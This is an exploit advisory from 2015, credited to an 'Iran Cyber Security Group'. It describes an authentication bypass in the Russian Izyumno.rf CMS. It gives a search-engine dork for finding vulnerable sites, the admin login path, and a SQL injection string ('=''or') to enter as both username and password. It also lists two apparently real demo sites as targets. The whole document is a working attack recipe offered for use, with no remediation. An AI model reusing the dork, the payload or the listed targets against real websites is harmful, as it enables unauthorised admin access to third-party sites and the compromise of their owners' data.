# Exploit Title : Izyumno.rf(Изюмно.рф) CMS Authentication Bypass Vulnerability
# Date : 22/06/2015
# Exploit Author : Iran Cyber Security Group
# Discovered By : WH!T3 W01F
# Category : Web Application Bugs
# Dork : Разработка сайта: Изюмно.рф or "Разработка сайта: Изюмно.рф" or intext:Разработка сайта: Изюмно.рф
# Tested On : Windows
# Home : Iran-Cyber.Org
# Description :
By This Vulenarabity You Can Bypass Authentication And Get Logged In Like An Admin.
# Proof Of Concept :
First Find Targets By Searching The Dork In Search Engines Like Google,Bing,...
After You Selected Your Target Use This Exploit :
# http://site.com/admin
Then The Admin Page Comes,Use These Usernames And Passwords :
Username : '=''or'
Password : '=''or'
# Demo :
# http://www.Xass-go.ru/admin/
# http://svetlXydom74.ru/admin/
------------------------------
Website : Iran-Cyber.Org
# Thanks To : root3r | MOHAMAD-NOFOZI | KamraN HellisH | JOK3R | Pi.Hack | CRY$I$ BL4CK | And All Members Of Iran-Cyber.Org